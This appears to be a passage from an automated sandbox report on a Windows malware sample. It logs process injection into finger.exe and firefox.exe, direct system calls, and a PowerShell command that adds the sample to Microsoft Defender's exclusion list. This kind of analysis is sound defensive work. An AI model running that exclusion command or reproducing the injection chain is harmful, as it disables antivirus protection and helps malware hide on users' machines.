                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC8F9 mov eax, dword ptr fs:[00000030h]4_2_00FFC8F9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC8F9 mov eax, dword ptr fs:[00000030h]4_2_00FFC8F9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E908 mov eax, dword ptr fs:[00000030h]4_2_0103E908
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E908 mov eax, dword ptr fs:[00000030h]4_2_0103E908
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104C912 mov eax, dword ptr fs:[00000030h]4_2_0104C912
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104892A mov eax, dword ptr fs:[00000030h]4_2_0104892A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0105892B mov eax, dword ptr fs:[00000030h]4_2_0105892B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE8C0 mov eax, dword ptr fs:[00000030h]4_2_00FEE8C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01040946 mov eax, dword ptr fs:[00000030h]4_2_01040946
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094940 mov eax, dword ptr fs:[00000030h]4_2_01094940
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100096E mov eax, dword ptr fs:[00000030h]4_2_0100096E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100096E mov edx, dword ptr fs:[00000030h]4_2_0100096E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100096E mov eax, dword ptr fs:[00000030h]4_2_0100096E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104C97C mov eax, dword ptr fs:[00000030h]4_2_0104C97C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0887 mov eax, dword ptr fs:[00000030h]4_2_00FC0887
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe"
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Memory written: C:\Users\user\Desktop\QmBbqpEHu0.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: NULL target: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe protection: execute and read and write
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe protection: read write
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\finger.exe | Thread register set: target process: 7344
Source: C:\Windows\SysWOW64\finger.exe | Thread APC queued: target process: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe"
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Process created: C:\Users\user\Desktop\QmBbqpEHu0.exe "C:\Users\user\Desktop\QmBbqpEHu0.exe"
Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe | Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
Source: C:\Windows\SysWOW64\finger.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: cqvjCApYGBKzop.exe, 00000009.00000002.3587312043.0000000001C01000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000000.2186073136.0000000001C00000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3587711896.0000000001901000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: cqvjCApYGBKzop.exe, 00000009.00000002.3587312043.0000000001C01000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000000.2186073136.0000000001C00000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3587711896.0000000001901000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: cqvjCApYGBKzop.exe, 00000009.00000002.3587312043.0000000001C01000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000000.2186073136.0000000001C00000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3587711896.0000000001901000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: cqvjCApYGBKzop.exe, 00000009.00000002.3587312043.0000000001C01000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000000.2186073136.0000000001C00000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3587711896.0000000001901000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Users\user\Desktop\QmBbqpEHu0.exe VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
